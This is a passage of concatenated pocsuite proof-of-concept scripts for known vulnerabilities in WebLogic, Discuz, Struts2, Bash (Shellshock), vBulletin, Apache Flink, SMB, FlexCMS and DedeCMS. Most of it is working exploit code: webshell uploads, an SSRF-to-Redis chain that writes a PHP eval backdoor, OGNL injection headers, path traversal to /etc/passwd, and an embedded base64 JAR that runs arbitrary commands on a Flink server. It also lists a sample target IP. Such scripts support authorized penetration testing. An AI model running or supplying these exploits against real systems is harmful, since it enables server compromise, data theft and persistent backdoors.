        print("[-] Change New Upload Path failed")
        exit(resp.content)

def upload_webshell(host, uri):
    set_new_upload_path(host, get_new_work_path(host))
    upload_content = "POC test"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest', }
    files = {
        "ks_edit_mode": "false",
        "ks_password_front": "test",
        "ks_password_changed": "true",
        "ks_filename": ("test.jsp",upload_content)
    }

    resp = req.post(host + uri, files=files)
    response = resp.text
    match = re.findall("<id>(.*?)</id>", response)
    if match:
        tid = match[-1]
        shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_test.jsp"
        if upload_content in req.get(shell_path, headers=headers).content:
            print shell_path
            return True
        else:
            return False
    else:
        return False


class TestPOC(POCBase):
    vulID = '0'  # vul ID
    version = '1'
    author = 'liujun'
    vulDate = '2018'
    createDate = '2018'
    updateDate = '2018'
    references = ['https://mp.weixin.qq.com/s/y5JGmM-aNaHcs_6P9a-gRQ']
    name = 'Weblogic 任意文件上传漏洞(CVE-2018-2894)'
    appPowerLink = 'http://www.oracle.com/'
    appName = 'Weblogic'
    appVersion = '12.2.1.3'
    vulType = 'File Upload'
    desc = '''
        Web Service Test Page 在“生产模式”下默认不开启，所以该漏洞有一定限制。
        利用该漏洞，可以上传任意jsp文件，进而获取服务器权限
    '''

    samples = []

    def _verify(self):
        uri = "/ws_utc/resources/setting/keystore"
        result = {}
        flag = upload_webshell(self.url, uri)
        if flag:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def _attack(self):
        """attack mode"""
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)



	




#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import urlparse
from pocsuite.api.request import req
from pocsuite.api.utils import randomStr


class TestPOC(POCBase):
    vulID = 'N/A'  # ssvid
    version = '1.0'
    author = ['co0ontty']
    vulDate = ''
    createDate = ''
    updateDate = ''
    references = ['']
    name = ''
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = ''
    desc = ''' 
    '''
    samples = ['']
    install_requires = ['']

    def _verify(self):
        result = {}
        base_url = self.url
        if (urlparse.urlparse(base_url).port) is None:
            base_url = base_url+":8888"
        payload = "{}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development".format(self.url)
        req_result = req.get(payload).text
        if "root:/root:/bin/ash" in req_result:
            print(req_result)
            result['VerifyInfo'] = "success"
        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# code:utf-8

import string
import random
import hashlib
import base64
import urlparse

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '91879'  # ssvid
    version = 'beta'
    author = ['whoam1']
    vulDate = '2016-06-21'
    createDate = '2016-06-23'
    updateDate = '2016-06-23'
    references = ['https://www.seebug.org/vuldb/ssvid-91879']
    name = 'Discuz_ssrf_redis_codeexec.'
    appPowerLink = 'http://www.discuz.net'
    appName = 'Discuz!'
    appVersion = '3.2X'
    vulType = 'Code Execution'
    desc = '''
        Discuz_ssrf_redis_codeexec.
    '''
    samples = ['']
    install_requires = ['']
    

    def _attack(self):
        result = {}
        ssrf_url = "ssrf.php?ssrf=" #对应dz文件

        payload = ('gopher://127.0.0.1:6379/'\
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'\
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
                   'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
                   ' end;return 1;" 0 %250D%250Aquit')

        web_url = self.url.rpartition('/')
        self.url = web_url[0]+ '/' + web_url[2] + '/'
        vul_url = self.url + ssrf_url + payload
        base_rep = req.get(vul_url)
        web_url = self.url.rpartition('/')
        while base_rep.status_code == 200:
            shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            rep = req.get(shell_url)
            if rep.status_code == 200:
                shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[she1l]);?>");'
                shell_payload_b64 = base64.b64encode(shell_payload)    
                attack_url= shell_url + '&a=' + shell_payload_b64               
                req.get(attack_url)
                flag = "phpinfo";
                shell_url = web_url[0] + '/' + 'shell.php'
                verify_url = shell_url + "?she1l=phpinfo();"
                rep = req.get(verify_url)
                if rep.status_code == 200 and flag in rep.content:
                    result['ShellInfo'] = {}
                    result['ShellInfo']['URL'] = shell_url
                    result['ShellInfo']['Content'] = '@eval($_REQUEST[she1l]);'

                    #后台内存清理
                    payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                    recover_url = self.url + ssrf_url +payload_flush
                    req.get(recover_url)
                    req.get(web_url[0] + '/forum.php')
                break
                web_url = web_url[0].rpartition('/')
        return self.parse_output(result)
        return self.parse_output(result)

    def _verify(self):
        '''
            本地搭建ssrf.php,验证PoC
        '''
        ssrf_url = "ssrf.php?ssrf=" #
        result = {}  

        payload = ('gopher://127.0.0.1:6379/'\
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'\
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
                   'a:1:{s:7:\\\"plugins\\\";s:10:\\\"phpinfo();\\\";}}}'\
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
                   ' end;return 1;" 0 %250D%250Aquit')

        web_url = self.url.rpartition('/') 
        self.url = web_url[0]+ '/' + web_url[2] + '/'
        vul_url = self.url + ssrf_url + payload
        base_rep = req.get(vul_url)
        
        while base_rep.status_code == 200:
            verify_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            rep = req.get(verify_url)
            flag = 'phpinfo';

            if flag in rep.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = verify_url
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + ssrf_url + payload_flush
                req.get(recover_url)
                req.get(web_url[0] + '/forum.php')

                break

            web_url = web_url[0].rpartition('/')

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
# import os
import random
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '0'
    version = '0'
    author = ['None']
    vulDate = 'None'
    createDate = 'None'
    updateDate = 'None'
    references = ['None']
    name = 'Struts2 方法调用远程代码执行漏洞(S2-045)'
    appPowerLink = 'http://struts.apache.org/'
    appName = 'Apache Struts'
    appVersion = ''
    vulType = 'Code Execution'
    desc = '''
    '''
    samples = ['']
    install_requires = ['']

    def _attack(self):
        return self._verify()

    def _verify(self):
        try:
            result = {}

            header = dict()
            header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
            header["Content-Type"] = "%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#outstr.println(100*100*112)).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
            r = req.get(self.url, headers=header, timeout=10)
            if "1120000" in r.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
            # Write your code here
        except Exception:
            pass

        return self.parse_output(result)

    def parse_output(self, result):
        # parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



"""

If you have issues about development, please read:

https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md

for more about information, plz visit http://pocsuite.org

"""

import random

import re

import string

from os.path import normpath

from urllib.parse import urljoin, urlparse, urlunparse



from pocsuite3.api import Output, POCBase, register_poc, requests, logger

from pocsuite3.api import get_listener_ip, get_listener_port

from pocsuite3.api import REVERSE_PAYLOAD

from pocsuite3.lib.utils import random_str

from requests.exceptions import ReadTimeout





class DemoPOC(POCBase):

    vulID = '1521'  # ssvid

    version = '1'

    author = ['chenghs@knownsec.com']

    vulDate = '2014-09-24'

    createDate = '2014-09-25'

    updateDate = '2014-09-25'

    references = ['https://www.invisiblethreat.ca/2014/09/cve-2014-6271/']

    name = 'Bash 4.3 远程命令执行漏洞 POC'

    appPowerLink = 'http://www.gnu.org/software/bash/'

    appName = 'Bash'

    appVersion = '3.0-4.3#'

    vulType = 'Command Execution'

    desc = '''

            Bash 在解析环境变量时，会解析函数，同时可以运行函数后的语句，造成命令执行。

            '''

    samples = []

    install_requires = ['']



    def _verify(self):

        result = {}



        try:

            vul_url = get_url_need(self.url)

            if not vul_url.endswith('.cgi') and not vul_url.endswith('.sh'):

                pass

            else:

                random_str = ''.join(random.sample(string.ascii_letters + string.digits, 50))

                headers_fake = {}

                headers_fake['User-Agent'] = '() { :; }; echo; echo X-Bash-Test: %s' % random_str



                response = requests.get(vul_url, headers=headers_fake)

                response = response.text



                if 'X-Bash-Test: %s' % random_str == response.split('\n')[0]:

                    result['VerifyInfo'] = {}

                    result['VerifyInfo']['URL'] = vul_url

        except Exception as e:

            logger.exception(e)

        return self.parse_output(result)



    def parse_output(self, result):

        output = Output(self)

        if result:

            output.success(result)

        else:

            output.fail('target is not vulnerable')

        return output



    def _attack(self):

        return self._verify()



    def _shell(self):

        pass





def get_url(url):

    try:

        return requests.get(url).url

    except:

        return url





def fix_url(url):

    if not url.startswith('http'):

        url = 'http://%s' % url

    return url





def get_url_need(url):

    url_need = None



    url = fix_url(url)



    if url.endswith('.cgi') or url.endswith('.sh'):

        url_need = url

        return url_need



    url = get_url(url)

    url_need = get_link(url)



    if not url_need:

        # print '[*] get url need error'

        url_need = url



    info = url_need

    # print info

    return info





def get_link(url):

    rnt = ''

    try:

        page_content = requests.get(url).text

        match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:cgi|sh|pl))''', page_content)

        for item_url in match:

            if not item_url.startswith('http'):

                item_url = getAbsoluteURL(url, item_url)

            if not is_url_exist(item_url):

                continue

            if isSameDomain(item_url, url):

                rnt = item_url

                break

        return rnt

    except:

        # raise e

        return rnt





def getAbsoluteURL(base, url):

    url1 = urljoin(base, url)

    arr = urlparse(url1)

    path = normpath(arr[2])

    return urlunparse((arr.scheme, arr.netloc, path, arr.params, arr.query, arr.fragment))





def is_url_exist(url):

    try:

        resp = requests.get(url)

        if resp.status_code == 404:

            return True

    except Exception as e:

        pass

    return False





def isSameDomain(url1, url2):

    try:

        if urlparse(url1).netloc.split(':')[0] == urlparse(url2).netloc.split(':')[0]:

            return True

        else:

            return False

    except:

        return False





register_poc(DemoPOC)


#!/usr/bin/env python
# coding: utf-8

from pocsuite.api.request import req #用法和 req 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from pocsuite.api.request import req
import string 
import random

class TestPOC(POCBase):
    vulID = '98077'  # ssvid
    version = '1'
    author = ['co0ontty']
    vulDate = '2016-09-25'
    createDate = '2016-09-25'
    updateDate = '2016-09-25'
    references = ['https://seclists.org/fulldisclosure/2019/Sep/31', 'https://www.seebug.org/vuldb/ssvid-98077']
    name = 'vBulletin 5.x 0day pre-auth 远程命令执行漏洞'
    appPowerLink = 'https://www.vbulletin.com/'
    appName = 'vBulletin'
    appVersion = 'vBulletin 5.x '
    vulType = '命令执行'
    desc = '''
        攻击者可以通过构造非法的请求实现远程命令执行的效果
    '''
    samples = ['']

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        target = self.url
        params = {"routestring":"ajax/render/widget_php"}
        random_int1 = random.randint(0,200000)
        random_int2 = random.randint(0,200000)
        params["widgetConfig[code]"] = "echo shell_exec('expr {} + {}'); exit;".format(random_int1,random_int2)
        r = req.post(target, data = params)
        if r.status_code == 200 and str(random_int1+random_int2) in r.text :
            result['result'] = {}
            result['result']['text'] = r.text
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



from cvpoc.lib.controller.controller import start
from cvpoc.lib.core.common import single_time_warn_message
from cvpoc.lib.core.data import conf, kb, logger, paths
from cvpoc.lib.core.datatype import AttribDict
from cvpoc.lib.core.enums import PLUGIN_TYPE, POC_CATEGORY, VUL_TYPE
from cvpoc.lib.core.option import init, init_options
from cvpoc.lib.core.plugin import PluginBase, register_plugin
from cvpoc.lib.core.poc import POCBase, Output
from cvpoc.lib.core.register import (
    load_file_to_module,
    load_string_to_module,
    register_poc,
)
from cvpoc.lib.core.settings import DEFAULT_LISTENER_PORT
from cvpoc.lib.request import requests
from cvpoc.lib.utils import get_middle_text, generate_shellcode_list, random_str
from cvpoc.modules.listener import REVERSE_PAYLOAD
from cvpoc.modules.spider import crawl
from cvpoc.modules.httpserver import PHTTPServer
from cvpoc.lib.core.interpreter_option import OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptString, \
    OptItems, OptDict

__all__ = (
    'requests', 'PluginBase', 'register_plugin',
    'PLUGIN_TYPE', 'POCBase', 'Output', 'AttribDict', 'POC_CATEGORY', 'VUL_TYPE',
    'register_poc', 'conf', 'kb', 'logger', 'paths', 'DEFAULT_LISTENER_PORT', 'load_file_to_module',
    'load_string_to_module', 'single_time_warn_message',
    'PHTTPServer', 'REVERSE_PAYLOAD', 'get_listener_ip', 'get_listener_port',
    'get_results', 'init_cvpoc', 'start_cvpoc', 'get_poc_options', 'crawl',
    'OptDict', 'OptIP', 'OptPort', 'OptBool', 'OptInteger', 'OptFloat', 'OptString',
    'OptItems', 'OptDict', 'get_middle_text', 'generate_shellcode_list', 'random_str', "parse_output")


def parse_output(result):
    output = Output()
    if result.get('status') is True:
        output.success(result)
    else:
        output.fail('target is not vulnerable')
    return output


def get_listener_ip():
    return conf.connect_back_host


def get_listener_port():
    return conf.connect_back_port


def get_current_poc_obj():
    pass


def get_poc_options(poc_obj=None):
    poc_obj = poc_obj or kb.current_poc
    return poc_obj.get_options()


def get_results():
    return kb.results


def init_cvpoc(options={}):
    init_options(options)
    init()


def start_cvpoc():
    start()



#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from urlparse import urljoin
from pocsuite.lib.core.enums import CUSTOM_LOGGING
from pocsuite.lib.core.data import logger
from pocsuite.api.request import req
import time,sys,json,base64,argparse,trace,re
import cStringIO


class TestPOC(POCBase):
    vulID = '98101'
    version = '1.0'
    author = 'co0ontty'
    vulDate = '2019-11-14'
    createDate = '2019-11-14'
    updateDate = '2019-11-14'
    references = ['https://www.seebug.org/vuldb/ssvid-98101']
    name = 'Apache Flink 任意 Jar 包上传导致远程代码执行漏洞'
    appPowerLink = 'https://flink.apache.org/'
    appName = 'Apache flink'
    appVersion = 'Apache Flink<=1.9.1'
    vulType = '代码执行'
    desc = '''
    攻击者可利用该漏洞在 Apache Flink Dashboard 页面中上传任意 Jar 包获取服务器最高权限。
    '''
    samples = ['http://54.77.247.43:8081']
    install_requires = ['']

    def _verify(self):
        default_headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0 Safari/537.36'}
        upload_jar_name = 'check-execute.jar'
        
        def check_jar_exsits(site, upload_jar_name):
            list_jar_url = "{}/jars/".format(site)
            response = req.get(list_jar_url, headers=default_headers, verify=False, timeout=30)
            if response.status_code == 200 and "application/json" in response.headers.get("Content-Type", ""):
                try:
                    r = json.loads(response.text)
                    for upload_file in r['files']:
                        if str(upload_file['id']).endswith('{}'.format(upload_jar_name)):
                            return upload_file['id']
                except Exception as e:
                    return False
            return False


        def upload_execute_jar(site, upload_jar_name):
            upload_jar_url = "{}/jars/upload".format(site)
            file_content = base64.b64decode('UEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAwQKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAE1FVEEtSU5GL1BLAwQUAAgICAAidW1PAAAAAAAAAAAAAAAADQAAAEV4ZWN1dGUuY2xhc3ONVet2E1UU/k4yyUwmQy+TQlsQBdSStqSxiIotIlAKVkJbSa0G8DKZHpPTJjNhLjTVCvoQ/ugT8MsfqCtx0aUPwEOx3Gdo09KGtUzW7H3O3vvbt7PPzPMXz/4FMIlfdbyDyxo+1XBFx1Vc05HCjIbrks+quKHipobPNMzp0PC5hlsqChpu6+jBvCQLGhal6gsVd3QUsaRjAF9qWJb8K0m+lqQkyd0URbin4r6OkzLoN5J/K8l3Or6HpaKswmZIXhKOCC4zxLOjywzKjLvCGXoLwuHzYb3MvSWrXCOJWXBtq7ZseULud4RKUBU+Q6ow2+R2GPBpEtUt4TAcy94rrFoPrXzNcir5YuAJpzItA7AGw/F9qkXPtbnvXwtFbYV75CDeCDZkuENo8m15FQqX6eKaHLuEtesrtJI2h0NIG7ujCQNRyxdty3GiqPps0+aNQLiOr4J86EU39Gx+Q8gyjZ3yJiTSwLsYYQCD6voTjlXnKriBH1AxUIWgJNaFY2AVawxDr6uToe9gCeSPsp/gTQoYy9syTI5k+bJw8n6VkogAws2/zCkVKcqWX5WWNQN1UNtjOQK6oB73H6pSxQMDHnxpH5Dp/asGQjw0sA7KtwlhYAMjBn7ETwyDB9PrJB7fvLJpYBM/G3gEoeKxgV9Qo0x3mvRKaQvlVW5TsMyeqNPoV3uw4Qe8zpCu8IBa1eCenIKRbJch6nb46cAtuOvcm7F8SmAg29VIs10noOmk8Tix3/FM1fKK/EHIHZtPj95lONotLM1ukjeFH/jRXSGzhB9YXiDNR7tOW/8hIUMP1TfnNMKA3HKLCh7cBdPJ7lMQfCjbVSETMUKfX+c1UReBPJKzr2/TgTFXq5Y/z5uUtOJELGHXXNmyuBvKSjoRF8nJXipJq9HgDl2L3P86kL3LrAXu7nRnurim+A25w2m8Te9G+YvRxaILRvQs7fLE6a4hMdYGexqps0STkZBhlKjx0gBjGCeewjnkyIrAbInskiT7y4wVxuLnb5vxv6G0kDCTLahbOLUNrZT8B6lS3NSLJcVMF0uJc8U2jPknuGAemVK20VMye9voa6F/C6rZK0W7mGFFYswOJtdCRuoHSsMU5Ggbx8zBFoamEsOJFoa3kJb8+BMo4wW5OvEH3tjGyVIbb5pvtXBqnJ5o0cLpFs7s1fohjhCN01+BSvUMEr1AdV6EjptI4xbpOXqxhj66kP34DSb+RCbqzR36WEwScoIaGSdEDu/RXpE9wXm8H/l9St4m5dsMv+MDWsXI28IOYg1zFP8jQjwifhEfU5+nCKWQ/TQ9l6IsP/kPUEsHCEEOnKXWAwAA4gYAAFBLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAAAAAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwECCgAKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAB2AAAATUVUQS1JTkYvUEsBAhQAFAAICAgAInVtT0EOnKXWAwAA4gYAAA0AAAAAAAAAAAAAAAAAnQAAAEV4ZWN1dGUuY2xhc3NQSwUGAAAAAAMAAwC4AAAArgQAAAAA')
            files = {'jarfile': (upload_jar_name, cStringIO.StringIO(file_content), 'application/octet-stream')}
            try:
                req.post(upload_jar_url, headers=default_headers, files=files, timeout=30, verify=False)
            except Exception as e:
                return False
            return True


        def delete_exists_jar(site, jar_hash_name):
            single_jar_url = "{}/jars/{}".format(site, jar_hash_name)
            try:
                response = req.delete(single_jar_url, headers=default_headers, verify=False, timeout=30)
                if response.status_code == 200 and "application/json" in response.headers.get("Content-Type", ""):
                    return True
            except Exception as e:
                return False
            return False

        def exec_command(site, command):
            headers = {
                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0 Safari/537.36',
                'Content-Type': 'application/json;charset=utf-8',
            }
            jar_hash_name = check_jar_exsits(site, upload_jar_name)
            data = r'{"entryClass":"Execute","parallelism":null,"programArgs":"\"%s\"","savepointPath":null,"allowNonRestoredState":null}' % command
            if jar_hash_name:
                execute_cmd_url = '{}/jars/{}/run?entry-class=Execute&program-args="{}"'.format(site, jar_hash_name, command)
            else:
                upload_execute_jar(site, upload_jar_name)
                jar_hash_name = check_jar_exsits(site, upload_jar_name)
                if jar_hash_name:
                    execute_cmd_url = '{}/jars/{}/run?entry-class=Execute&program-args="{}"'.format(site, jar_hash_name, command)
                else:
                    return False
            try:
                r1 = req.post(execute_cmd_url, headers=headers, data=data, verify=False, timeout=20)
                match = re.findall('\|@\|(.*?)\|@\|', r1.text)
                delete_exists_jar(site, jar_hash_name)
                if match:
                    return match[0][:-2] if match[0][:-2] else "[result is blank]"
            except req.exceptions.ReadTimeout as e:
                return "[execute timeout]"
            return False

        result = {}
        target = self.url
        if 'cmd' not in self.params:
            logger.log(CUSTOM_LOGGING.SYSINFO,
                       "You can use --extra-params=\"{'cmd': 'xxx'}\" to exec command")
            command =  "whoami"
        else:
            command = self.params['cmd']
        try:
            r = exec_command(target,command)
            if r:
                result['VerifyInfo'] = {}
                result['VerifyInfo'] = "{}".format(r.replace('\\n', '\n'))
                result['VerifyInfo'] = self.url
        except :
            pass
        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

# requests
from pocsuite.api.request import req
import urllib
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
# url转换host
from pocsuite.lib.utils.funs import url2ip


# 基础基类
class SMBPOC(POCBase):
    vulID = '36'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2018-06-7'  # 漏洞公开的时间,不知道就写今天
    author = 'xiaohuihui1'  # PoC作者的大名
    createDate = '2018-06-7'  # 编写 PoC 的日期
    updateDate = '2018-06-7'  # PoC 更新的时间,默认和编写时间一样
    references = 'http://netsecurity.51cto.com/art/201705/539811.htm'  # 漏洞地址来源,0day不用写
    name = 'smb os injection'  # PoC 名称
    appPowerLink = 'https://www.microsoftstore.com.cn'  # 漏洞厂商主页地址
    appName = 'smb'  # 漏洞应用名称
    appVersion = 'all versions'  # 漏洞影响版本
    vulType = 'smb os injection'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        永恒之蓝
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重"  # 严重,高危,中危,低危

    # 指纹方法
    def _fingerprint(self):
        pass

    def _verify(self):
        # 调用指纹方法
        result={}
        output = Output(self)
        import socket
        import binascii
        vul_ip = self.url
        vul_ip = vul_ip[7:]


        negotiate_protocol_request = binascii.unhexlify(
        "00000054ff534d42720000000018012800000000000000000000000000002f4b0000c55e003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200")
        session_setup_request = binascii.unhexlify(
        "00000063ff534d42730000000018012000000000000000000000000000002f4b0000c55e0dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(10)
            s.connect((vul_ip, 445))
            s.send(negotiate_protocol_request)
            s.recv(1024)
            s.send(session_setup_request)
            data = s.recv(1024)
            user_id = data[32:34]
            tree_connect_andx_request = "000000%xff534d42750000000018012000000000000000000000000000002f4b%sc55e04ff000000000001001a00005c5c%s5c49504324003f3f3f3f3f00" % ((58 + len(vul_ip)), user_id.encode('hex'), vul_ip.encode('hex'))
            s.send(binascii.unhexlify(tree_connect_andx_request))
            data = s.recv(1024)
            allid = data[28:36]
            payload = "0000004aff534d422500000000180128000000000000000000000000%s1000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00" % allid.encode('hex')
            s.send(binascii.unhexlify(payload))
            data = s.recv(1024)
            s.close()
            if "\x05\x02\x00\xc0" in data:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = vul_ip
                
            s.close()
        except Exception as e:
            print(str(e))
        print('[+]36 poc done')
        return self.save_output(result)
    # 攻击模块
    def _attack(self):
        return self._verify()
        #pass

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# 注册类
register(SMBPOC)



#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from urlparse import urljoin

class TestPOC(POCBase):
    vulID = 'SSV-85553'  # vul ID
    version = '1'
    author = 'fenghh'
    vulDate = '2008-08-15'
    createDate = '2015-10-17'
    updateDate = '2015-10-17'
    references = ['https://www.exploit-db.com/exploits/32254/']
    name = "FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting Vulnerability"
    appPowerLink = 'http://www.flexcms.com/'
    appName = 'FlexCMS'
    appVersion = '2.5'
    vulType = 'XSS'
    desc = '''  
        FlexCMS是一套网站内容管理系统。 
        FlexCMS 2.5以及之前的版本中的inc-core-admin-editor-previouscolorsjs.php存在跨站脚本攻击漏洞,
        当register_globals选项被激活时，远程攻击者可以借助reviousColorsString参数，
        注入任意的web脚本或HTML。
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        payload_xss = "/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=%3Cscript%3Ealert(/SebugTest/)%3C/script%3E"
        res = req.get(urljoin(self.url, payload_xss), timeout=5)
        return self.parse_verify(res)

    def parse_verify(self, res):
        output = Output(self)
        result = {}
        if  '>alert(/SebugTest/)' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            output.success(result)           
        else:
            output.fail('Internet Nothing returned')
        return output

    def _attack(self): 
        return self._verify()
        
register(TestPOC)


#!/usr/bin/env python
# coding: utf-8

import urllib
import random
import string
from collections import OrderedDict

from pocsuite.api.request import req  #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class DedeShortNamePOC(POCBase):
    PocName = 'short_name_dede_cms'
    vulID = '3387'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  #默认为1
    author = 'zx'  #  PoC作者的大名
    vulDate = '2018/11/21'  #漏洞公开的时间,不知道就写今天
    createDate = '2018/11/21'  # 编写 PoC 的日期
    updateDate = '2018/11/21'  # PoC 更新的时间,默认和编写时间一样
    references = [
        'https://technet.microsoft.com/library/security/ms15-034']  # 漏洞地址来源,0day不用写
    name = 'short_name_dede_cms 漏洞 PoC'  # PoC 名称
    appPowerLink = 'https://www.microsoft.com/'  # 漏洞厂商主页地址
    appName = 'iis'  # 漏洞应用名称
    appVersion = '7.5'  # 漏洞影响版本
    vulType = 'Command Execution'  #漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        dedecms结合iis短文件名漏洞备份文件泄露。
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写

    def GetBackUp(self,url):
        for num in range(1, 5):
            try:
                newurl = url.strip() + "/data/backupdata/dede_a~" + str(num) + '.txt'
                # print newurl
                r = req.get(newurl, timeout=8)
                if r.status_code == 200 and "dede_" in r.text:
                    if len(r.text) > 1000:
                        pass
                    else:
                        if "dede_admin" in r.text:
                            self.url=newurl
                            return 1
                else:
                    return 0
            except:
                continue
        return 0
    def TestingCms(self,url):
        dedehash = [
            "/data/admin/ver.txt",
            "/data/admin/allowurl.txt",
